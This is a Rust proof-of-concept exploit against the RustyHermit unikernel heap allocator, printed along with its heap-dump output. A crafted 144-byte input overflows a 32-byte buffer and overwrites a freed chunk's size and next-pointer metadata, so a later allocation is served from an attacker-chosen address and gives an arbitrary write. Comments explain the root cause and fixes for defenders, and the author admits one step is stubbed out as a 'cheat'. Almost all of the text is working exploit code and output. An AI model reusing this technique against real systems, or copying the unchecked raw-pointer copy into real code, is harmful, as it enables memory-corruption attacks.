RustyHermit Heap Overflow to Arbitrary Write Proof of Concept
--- Welcome aboard our Airbus A 1337! --- | |
[info] Main @ 0x1906700 | |
heap layout after allocating all buffers | |
0x1c04200: 0x101010101010101 | |
0x1c04208: 0x101010101010101 | |
0x1c04210: 0x101010101010101 | |
0x1c04218: 0x101010101010101 | |
0x1c04220: 0x0 | |
0x1c04228: 0x0 | |
0x1c04230: 0x0 | |
0x1c04238: 0x0 | |
0x1c04240: 0x0 | |
0x1c04248: 0x0 | |
0x1c04250: 0x0 | |
0x1c04258: 0x0 | |
0x1c04260: 0x0 | |
0x1c04268: 0x0 | |
0x1c04270: 0x0 | |
0x1c04278: 0x0 | |
0x1c04280: 0x202020202020202 | |
0x1c04288: 0x202020202020202 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x303030303030303 | |
0x1c04388: 0x303030303030303 | |
0x1c04390: 0x303030303030303 | |
0x1c04398: 0x303030303030303 | |
0x1c043a0: 0x303030303030303 | |
0x1c043a8: 0x303030303030303 | |
0x1c043b0: 0x303030303030303 | |
0x1c043b8: 0x303030303030303 | |
0x1c043c0: 0x303030303030303 | |
0x1c043c8: 0x303030303030303 | |
0x1c043d0: 0x303030303030303 | |
0x1c043d8: 0x303030303030303 | |
0x1c043e0: 0x303030303030303 | |
0x1c043e8: 0x303030303030303 | |
0x1c043f0: 0x303030303030303 | |
0x1c043f8: 0x303030303030303 | |
0x1c04400: 0x1bfbc00 | |
0x1c04408: 0x0 | |
0x1c04410: 0x0 | |
0x1c04418: 0x0 | |
0x1c04420: 0x0 | |
0x1c04428: 0x0 | |
0x1c04430: 0x0 | |
0x1c04438: 0x0 | |
0x1c04440: 0x0 | |
0x1c04448: 0x0 | |
0x1c04450: 0x0 | |
0x1c04458: 0x0 | |
0x1c04460: 0x0 | |
0x1c04468: 0x0 | |
0x1c04470: 0x0 | |
0x1c04478: 0x0 | |
heap layout after deallocating buffer2 | |
0x1c04200: 0x101010101010101 | |
0x1c04208: 0x101010101010101 | |
0x1c04210: 0x101010101010101 | |
0x1c04218: 0x101010101010101 | |
0x1c04220: 0x0 | |
0x1c04228: 0x0 | |
0x1c04230: 0x0 | |
0x1c04238: 0x0 | |
0x1c04240: 0x0 | |
0x1c04248: 0x0 | |
0x1c04250: 0x0 | |
0x1c04258: 0x0 | |
0x1c04260: 0x0 | |
0x1c04268: 0x0 | |
0x1c04270: 0x0 | |
0x1c04278: 0x0 | |
0x1c04280: 0x80 | |
0x1c04288: 0x1c04400 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x303030303030303 | |
0x1c04388: 0x303030303030303 | |
0x1c04390: 0x303030303030303 | |
0x1c04398: 0x303030303030303 | |
0x1c043a0: 0x303030303030303 | |
0x1c043a8: 0x303030303030303 | |
0x1c043b0: 0x303030303030303 | |
0x1c043b8: 0x303030303030303 | |
0x1c043c0: 0x303030303030303 | |
0x1c043c8: 0x303030303030303 | |
0x1c043d0: 0x303030303030303 | |
0x1c043d8: 0x303030303030303 | |
0x1c043e0: 0x303030303030303 | |
0x1c043e8: 0x303030303030303 | |
0x1c043f0: 0x303030303030303 | |
0x1c043f8: 0x303030303030303 | |
0x1c04400: 0x1bfbc00 | |
0x1c04408: 0x0 | |
0x1c04410: 0x0 | |
0x1c04418: 0x0 | |
0x1c04420: 0x0 | |
0x1c04428: 0x0 | |
0x1c04430: 0x0 | |
0x1c04438: 0x0 | |
0x1c04440: 0x0 | |
0x1c04448: 0x0 | |
0x1c04450: 0x0 | |
0x1c04458: 0x0 | |
0x1c04460: 0x0 | |
0x1c04468: 0x0 | |
0x1c04470: 0x0 | |
0x1c04478: 0x0 | |
heap layout after cheating | |
0x1c04200: 0x4141414141414141 | |
0x1c04208: 0x4141414141414141 | |
0x1c04210: 0x4141414141414141 | |
0x1c04218: 0x4141414141414141 | |
0x1c04220: 0x4141414141414141 | |
0x1c04228: 0x4141414141414141 | |
0x1c04230: 0x4141414141414141 | |
0x1c04238: 0x4141414141414141 | |
0x1c04240: 0x4141414141414141 | |
0x1c04248: 0x4141414141414141 | |
0x1c04250: 0x4141414141414141 | |
0x1c04258: 0x4141414141414141 | |
0x1c04260: 0x4141414141414141 | |
0x1c04268: 0x4141414141414141 | |
0x1c04270: 0x4141414141414141 | |
0x1c04278: 0x4141414141414141 | |
0x1c04280: 0x40 | |
0x1c04288: 0x1c04380 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x303030303030303 | |
0x1c04388: 0x0 | |
0x1c04390: 0x303030303030303 | |
0x1c04398: 0x303030303030303 | |
0x1c043a0: 0x303030303030303 | |
0x1c043a8: 0x303030303030303 | |
0x1c043b0: 0x303030303030303 | |
0x1c043b8: 0x303030303030303 | |
0x1c043c0: 0x303030303030303 | |
0x1c043c8: 0x303030303030303 | |
0x1c043d0: 0x303030303030303 | |
0x1c043d8: 0x303030303030303 | |
0x1c043e0: 0x303030303030303 | |
0x1c043e8: 0x303030303030303 | |
0x1c043f0: 0x303030303030303 | |
0x1c043f8: 0x303030303030303 | |
0x1c04400: 0x1bfbc00 | |
0x1c04408: 0x0 | |
0x1c04410: 0x0 | |
0x1c04418: 0x0 | |
0x1c04420: 0x0 | |
0x1c04428: 0x0 | |
0x1c04430: 0x0 | |
0x1c04438: 0x0 | |
0x1c04440: 0x0 | |
0x1c04448: 0x0 | |
0x1c04450: 0x0 | |
0x1c04458: 0x0 | |
0x1c04460: 0x0 | |
0x1c04468: 0x0 | |
0x1c04470: 0x0 | |
0x1c04478: 0x0 | |
heap layout after exploit | |
0x1c04200: 0x4141414141414141 | |
0x1c04208: 0x4141414141414141 | |
0x1c04210: 0x4141414141414141 | |
0x1c04218: 0x4141414141414141 | |
0x1c04220: 0x4141414141414141 | |
0x1c04228: 0x4141414141414141 | |
0x1c04230: 0x4141414141414141 | |
0x1c04238: 0x4141414141414141 | |
0x1c04240: 0x4141414141414141 | |
0x1c04248: 0x4141414141414141 | |
0x1c04250: 0x4141414141414141 | |
0x1c04258: 0x4141414141414141 | |
0x1c04260: 0x4141414141414141 | |
0x1c04268: 0x4141414141414141 | |
0x1c04270: 0x4141414141414141 | |
0x1c04278: 0x4141414141414141 | |
0x1c04280: 0x40 | |
0x1c04288: 0x1c04500 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x404040404040404 | |
0x1c04388: 0x404040404040404 | |
0x1c04390: 0x404040404040404 | |
0x1c04398: 0x404040404040404 | |
0x1c043a0: 0x404040404040404 | |
0x1c043a8: 0x404040404040404 | |
0x1c043b0: 0x404040404040404 | |
0x1c043b8: 0x404040404040404 | |
0x1c043c0: 0x404040404040404 | |
0x1c043c8: 0x404040404040404 | |
0x1c043d0: 0x404040404040404 | |
0x1c043d8: 0x404040404040404 | |
0x1c043e0: 0x404040404040404 | |
0x1c043e8: 0x404040404040404 | |
0x1c043f0: 0x404040404040404 | |
0x1c043f8: 0x404040404040404 | |
0x1c04400: 0x404040404040404 | |
0x1c04408: 0x404040404040404 | |
0x1c04410: 0x404040404040404 | |
0x1c04418: 0x404040404040404 | |
0x1c04420: 0x404040404040404 | |
0x1c04428: 0x404040404040404 | |
0x1c04430: 0x404040404040404 | |
0x1c04438: 0x404040404040404 | |
0x1c04440: 0x404040404040404 | |
0x1c04448: 0x404040404040404 | |
0x1c04450: 0x404040404040404 | |
0x1c04458: 0x404040404040404 | |
0x1c04460: 0x404040404040404 | |
0x1c04468: 0x404040404040404 | |
0x1c04470: 0x404040404040404 | |
0x1c04478: 0x404040404040404 | |
[info] written to 0x1c04380! | |
--- Thank you for flying with Expl01t Airlines! --- |
#[cfg(target_os = "hermit")] | |
extern crate hermit_sys; | |
/// Dumps `0x280` bytes starting at `base` as 8-byte words, printing one
/// `address: 0xvalue` line per word by dereferencing raw pointers.
///
/// Debug helper for inspecting allocator metadata in place. The whole range
/// `base..base + 0x280` must be mapped and readable, or the read faults; the
/// caller is responsible for that, since this function cannot check it.
fn print_heap_layout(base: usize) {
    for offset in (0..0x280usize).step_by(8) {
        let word_ptr = (base + offset) as *const usize;
        // SAFETY: the caller guarantees `base..base + 0x280` is mapped and
        // readable (see the doc comment); no other invariant is relied on.
        let word = unsafe { *word_ptr };
        println!("{:p}: 0x{:x}", word_ptr, word);
    }
}
/// Proof of concept: an unbounded copy into a 32-byte heap buffer overwrites the
/// inline free-list ("hole") metadata of the freed chunk that follows it, so that
/// a later allocation is served from an attacker-chosen address.
///
/// Root cause, from a defender's view: the copy loop below writes `input.len()`
/// bytes into `buf` (allocated with 32 bytes) with no bounds check. The
/// allocator keeps each hole's size and `next` pointer inline in freed memory
/// with no integrity check, so a linear overflow turns into an
/// arbitrary-address allocation. A length check before the copy (reject or
/// truncate input longer than `buf.len()`, or use a bounds-checked
/// `copy_from_slice`) removes the bug at its source; hardening the allocator's
/// hole validation would limit the impact of similar overflows elsewhere.
///
/// All addresses hard-coded here (`0x1c04388`, the target encoded in `input`)
/// are specific to the heap layout observed in the accompanying output and are
/// not portable.
fn main() {
    println!("\n--- Welcome aboard our Airbus A 1337! ---\n");
    println!("[info] Main @ {:p}", main as *const ());

    // Simulated input (144 bytes): fills the legitimate buffer plus padding up
    // to 128 bytes, then overwrites the metadata of the hole that follows `buf`.
    let input: Vec<u8> = Vec::from([
        // fill legitimate buffer + padding to 128 bytes (32-byte `buf` plus the
        // space up to the next chunk's metadata; see the heap dump)
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        // overwrite the following hole's size field (little-endian u64)
        0x40, 0, 0, 0, 0, 0, 0, 0,
        // overwrite the following hole's next pointer with the arbitrary target
        // address (little-endian; layout-specific value)
        0x80, 0x43, 0xc0, 0x01, 0, 0, 0, 0
    ]);

    // Allocate three adjacent buffers. `buf` is the 32-byte victim; `buf2` is
    // freed next so that `buf` is directly followed by a hole; `_buf3` keeps a
    // live chunk behind that hole (see the first heap dump for the layout).
    let mut buf: Vec<u8> = vec![1; 32];
    let buf2: Vec<u8> = vec![2; 64];
    let _buf3: Vec<u8> = vec![3; 256];
    println!("\n heap layout after allocating all buffers");
    print_heap_layout(buf.as_ptr() as usize);

    // free buffer2 to have buffer followed by a hole; the allocator writes the
    // hole's size and next pointer inline at the start of the freed chunk
    drop(buf2);
    println!("\n heap layout after deallocating buffer2");
    print_heap_layout(buf.as_ptr() as usize);

    unsafe {
        // Vulnerable copy loop, e.g. a driver copying from shared MMIO: every
        // byte of `input` is written through a raw pointer with no comparison
        // against `buf`'s 32-byte allocation. This is the defect; the fix is a
        // length check (or a checked slice copy) before writing.
        let mut i = 0;
        for elem in input {
            *(buf.as_mut_ptr().offset(i)) = elem;
            i+=1;
        }
        // Allocator runs into a page fault when fake_hole.next_ptr is not
        // readable or not 0 (end of hole list).
        // Also the constraint hole_addr + hole.size <= addr has to be met for
        // the next hole; see src/mm/hole.rs#L244.
        // Thus, the constraints for this PoC to work are:
        // 1. The target address needs to hold a value large enough that the
        //    hole gets allocated, AND
        // 2. Target address + 8 has to be 0 or a valid readable address
        //    matching the above condition.
        // Cheat: set target address + 8 to 0 for this PoC (0x1c04388 is the
        // hard-coded target 0x1c04380 + 8, valid only for the observed layout;
        // the author stubs this write out rather than satisfying condition 2
        // through the overflow itself).
        *(0x1c04388 as *mut u64) = 0;
    }
    println!("\n heap layout after cheating");
    print_heap_layout(buf.as_ptr() as usize);

    // Allocate a buffer which is now served from the forged hole at the
    // arbitrary target address and fill it with the payload. In the
    // accompanying output it lands at 0x1c04380, inside the still-live `_buf3`,
    // whose bytes are overwritten with 0x04.
    let buf4: Vec<u8> = vec![4; 257];
    println!("\n heap layout after exploit");
    print_heap_layout(buf.as_ptr() as usize);
    println!("[info] written to {:p}!", buf4.as_ptr());

    println!("\n--- Thank you for flying with Expl01t Airlines! ---\n");
}